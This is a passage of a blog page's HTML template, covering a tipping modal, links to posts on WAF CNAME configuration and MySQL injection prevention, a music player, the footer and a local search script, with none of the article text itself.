        box-shadow: 0 6px 12px rgba(0, 0, 0, 0.2), 0 5px 15px rgba(0, 0, 0, 0.2);
    }

    #rewardModal {
        width: 320px;
        height: 350px;
    }

    #rewardModal .reward-title {
        margin: 15px auto;
        padding-bottom: 5px;
    }

    #rewardModal .modal-content {
        padding: 10px;
    }

    #rewardModal .close {
        position: absolute;
        right: 15px;
        top: 15px;
        color: rgba(0, 0, 0, 0.5);
        font-size: 1.3rem;
        line-height: 20px;
        cursor: pointer;
    }

    #rewardModal .close:hover {
        color: #ef5350;
        transform: scale(1.3);
        -moz-transform:scale(1.3);
        -webkit-transform:scale(1.3);
        -o-transform:scale(1.3);
    }

    #rewardModal .reward-tabs {
        margin: 0 auto;
        width: 210px;
    }

    .reward-tabs .tabs {
        height: 38px;
        margin: 10px auto;
        padding-left: 0;
    }

    .reward-content ul {
        padding-left: 0 !important;
    }

    .reward-tabs .tabs .tab {
        height: 38px;
        line-height: 38px;
    }

    .reward-tabs .tab a {
        color: #fff;
        background-color: #ccc;
    }

    .reward-tabs .tab a:hover {
        background-color: #ccc;
        color: #fff;
    }

    .reward-tabs .wechat-tab .active {
        color: #fff !important;
        background-color: #22AB38 !important;
    }

    .reward-tabs .alipay-tab .active {
        color: #fff !important;
        background-color: #019FE8 !important;
    }

    .reward-tabs .reward-img {
        width: 210px;
        height: 210px;
    }
</style>

<div id="reward">
    <a href="#rewardModal" class="reward-link modal-trigger btn-floating btn-medium waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close modal-close"><i class="fas fa-times"></i></a>
            <h4 class="reward-title">你的赏识是我前进的动力</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs row">
                        <li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                        <li class="tab col s6 wechat-tab waves-effect waves-light"><a href="#wechat">微 信</a></li>
                    </ul>
                    <div id="alipay">
                        <img src="/medias/reward/alipay.jpg" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                    <div id="wechat">
                        <img src="/medias/reward/wechat.png" class="reward-img" alt="微信打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('.tabs').tabs();
    });
</script>

            
        </div>
    </div>

    

    

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;Previous</div>
            <div class="card">
                <a href="/2021/03/05/%E5%BF%AB%E9%80%9F%E6%90%AD%E5%BB%BA%E9%98%B2%E7%81%AB%E5%A2%99Cname%E9%98%B2%E7%81%AB%E5%A2%99/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/1.jpg" class="responsive-img" alt="WAF防火墙CNAME配置方法">
                        
                        <span class="card-title">WAF防火墙CNAME配置方法</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2021-03-05
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            煮酒
                            
                        </span>
                    </div>
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                Current&nbsp;<i class="far fa-dot-circle"></i>
            </div>
            <div class="card">
                <a href="/2020/07/08/mysql/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/17.jpg" class="responsive-img" alt="mysql安全注入防范">
                        
                        <span class="card-title">mysql安全注入防范</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2020-07-08
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            煮酒
                            
                        </span>
                    </div>
                </div>

                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;TOC</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    
        <link rel="stylesheet" href="/libs/aplayer/APlayer.min.css">
<style>
    .aplayer .aplayer-lrc p {
        
        display: none;
        
        font-size: 12px;
        font-weight: 700;
        line-height: 16px !important;
    }

    .aplayer .aplayer-lrc p.aplayer-lrc-current {
        
        display: none;
        
        font-size: 15px;
        color: #42b983;
    }

    
    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body {
        left: -66px !important;
    }

    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body:hover {
        left: 0px !important;
    }

    
</style>
<div class="">
    
    <div class="row">
        <meting-js class="col l8 offset-l2 m10 offset-m1 s12"
                   server="netease"
                   type="playlist"
                   id="503838841"
                   fixed='true'
                   autoplay='false'
                   theme='#42b983'
                   loop='all'
                   order='random'
                   preload='auto'
                   volume='0.7'
                   list-folded='true'
        >
        </meting-js>
    </div>
</div>

<script src="/libs/aplayer/APlayer.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/meting@2/dist/Meting.min.js"></script>

    
    <div class="container row center-align" style="margin-bottom: 0px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2019-2021</span>
            
            <span id="year">2019</span>
            <a target="_blank">煮酒</a>
            |&nbsp;Powered by&nbsp;<a target="_blank">zhujiu</a>
            |&nbsp;Theme&nbsp;<a target="_blank">Matery</a>
            <br>
            
            
            
            
<!--             <span id="busuanzi_container_site_pv">
                |&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;<span id="busuanzi_value_site_pv"
                    class="white-color"></span>&nbsp;次
            </span>
            
            
            <span id="busuanzi_container_site_uv">
                |&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;<span id="busuanzi_value_site_uv"
                    class="white-color"></span>&nbsp;人
            </span> -->
            
            <br>
            
            <br>
            
        </div>
        <!-- <div class="col s12 m4 l4 social-link ">
    <a href="https://github.com/blinkfox" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>



    <a href="mailto:1181062873@qq.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fas fa-envelope-open"></i>
    </a>







    <a href="tencent://AddContact/?fromId=50&fromSubId=1&subcmd=all&uin=1181062873" class="tooltipped" target="_blank" data-tooltip="QQ联系我: 1181062873" data-position="top" data-delay="50">
        <i class="fab fa-qq"></i>
    </a>







    <a href="/atom.xml" class="tooltipped" target="_blank" data-tooltip="RSS 订阅" data-position="top" data-delay="50">
        <i class="fas fa-rss"></i>
    </a>

</div> -->
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;Search</span>
            <input type="search" id="searchInput" name="s" placeholder="Please enter a search keyword"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

    
    

    

    

	
    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
